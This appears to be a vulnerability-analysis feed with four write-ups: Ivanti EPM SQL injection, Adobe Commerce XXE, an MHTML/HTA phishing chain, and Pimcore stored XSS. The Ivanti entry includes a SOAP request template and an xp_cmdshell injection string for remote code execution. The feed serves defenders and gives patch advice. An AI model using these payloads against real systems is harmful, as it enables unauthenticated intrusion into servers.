Activity Feed

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Ivanti Endpoint Manager (EPM) versions 2022 SU5 and prior are vulnerable to SQL injection and a patch has been released, as described in the official advisory and the related KB article. It is possible to leverage this vulnerability to achieve unauthenticated remote code execution.

The function RecordGoodApp() in AppMonitorAction.cs is responsible for handling reports of “good” applications.

159     private static void RecordGoodApp(
160       LanDeskDatabase database,
161       string[] tokens,
162       DateTime reportDate,
163       int computer_idn)
164     {
165       try
166       {
167         GoodApp goodApp = new GoodApp(tokens);
168         try
169         {
170           string sql1 = string.Format("Select ReportedGoodApps_Idn from ReportedGoodApps where md5 = '{0}'", (object) goodApp.md5);
171           DataRow row1 = database.ExecuteRow(sql1);

As can be seen in line 170, goodApp.md5 value is used to construct a SQL query without any sanitization. It happens that this value is user-supplied and this function can be reached through the EventHandler web service endpoint. The attack consists in sending a SOAP request to this endpoint, substituting the MD5 value with the malicious SQL command:

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <UpdateStatusEvents xmlns="http://tempuri.org/">
      <deviceID>string</deviceID>
      <actions>
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          <status>GoodApp=1|md5=<SQL_COMMAND></status>
        </Action>
      </actions>
    </UpdateStatusEvents>
  </soap12:Body>
</soap12:Envelope>

To achieve remote code execution, the MS-SQL special command xp_cmdshell can be used this way:

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '<MALICIOUS COMMAND>'--

A Metasploit module is already available for this attack.

Note that this is an unauthenticated attack and it usually results in privileged access to the vulnerable system. Since Ivanti EPM is usually running as an NT Service user, this can be easily escalated to a NT AUTHORITY\SYSTEM privileged user.

Indicated source as
2
Ratings
Technical Analysis

Adobe Commerce, which is based on the Magento PHP suite, is a popular framework for commerce websites. CVE-2024-34102 is a critical unauthenticated XML injection vulnerability, initially reported by Sergey Temnikov, that targets Commerce. Unsafe deserialization of data is performed with tainted JSON string data, which results in an attacker-controlled SimpleXMLElement class that will resolve external entities.

An attacker with unauthenticated access to Adobe Commerce can send a crafted JSON string containing an XML object that embeds DTDs to read local files, including the env.php that contains the JWT secret. With this information, an attacker can forge their own privileged session token and authenticate to Adobe Commerce as an administrator. Sergey also reported that the vulnerability can be chained with the recent iconv bug in the glibc for RCE via PHP filters.

A Metasploit gather module for CVE-2024-34102 was contributed to the framework by @heyder. Anyone running Adobe Commerce or Magento that has not updated should do so urgently, since the vulnerability can be exploited without authentication for critical impact. Adobe has provided an official fix for the vulnerability that can be applied over previous emergency hotfixes.

Indicated source as
2
Ratings
Technical Analysis

Trend Micro reported this vulnerability to Microsoft after observing Void Banshee APT exploitation in the wild; the zero-day attack hinged on the premise that MHTML links would automatically open in the old Internet Explorer engine. Within the old engine context, HTA files will prompt to open by default, facilitating easier code execution. The threat actors were observed appending many spaces to the file name to misrepresent the secondary HTA file as a PDF in the IE pop-up box. Additionally, Check Point researcher Haifei Li is credited for a report that resulted in a “Defense-in-depth” patch for this chain, which is probably related to the HTA file name misrepresentation trick.

The process of exploitation would typically look like this:

  • An attacker site is visited or a phishing message is sent to the victim.
  • The victim downloads a malicious “.url” file that masquerades as a legitimate document.
  • The victim clicks the “.url” payload, opening the embedded “mhtml:” link and launching Internet Explorer.
  • The IE engine prompts the user to open the second-stage HTA file.
  • The victim clicks “open” on the pseudo-PDF prompt.
  • The victim clicks “Allow” on the IE security prompt for the “HTML Application host” execution.

In summary, the intent of this attack chain is to misrepresent and remove some security hurdles for malware execution on Windows. Successful exploitation does still require quite a bit of clicking through prompts by the user. However, this is likely enough to significantly increase execution numbers for the affiliated malware campaign, which was reported to be deploying information stealers.

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    High
Technical Analysis

Description

Missing Sanitization of $item->getGroup() (lines 864 and 1269) in fieldcollectionTreeAction/objectbrickTreeAction functions in bundles/AdminBundle/Controller/Admin/DataObject/ClassController.php allows Admin User to perform Source Code Injection through Stored Group Fields (in Object Bricks/Field Collection under settings module) resulting in Information Exposure (cookie theft).

Analysis

What makes this vulnerability stored is that the Group fields (for the listings under Object Bricks or Field Collection in the Settings Module) are saved to the database in the objectbrickUpdateAction function (serves the route /objectbrick-update for the methods {“PUT”, “POST”}).

Example of the PUT request: https://demo.pimcore.com/admin/class/objectbrick-update

That means the patch only mitigates the XSS in the objectbrickTreeAction function (serves the route /objectbrick-tree for the methods={“GET”, “POST”}).

Example of the GET request: https://demo.pimcore.com/admin/class/objectbrick-tree?_dc=1721102886220&grouped=1&node=0

The execution would happen in the Object Bricks/Field Collection listings for Data Objects in the Settings Module (span with class x-tree-node-text in a table with id treeview-record)

Rating

The attack is relatively straightforward (XSS payloads are well documented and relatively easy to craft), requiring low privileges (anyone could access the Demo with privileged permissions and target other active users) and minimal complexity, though user interaction is needed.
The vulnerability can lead to limited data exposure and modification but does not significantly impact availability. Since the Demo resets every two hours (restoring all data to the default state), it is minimally valuable.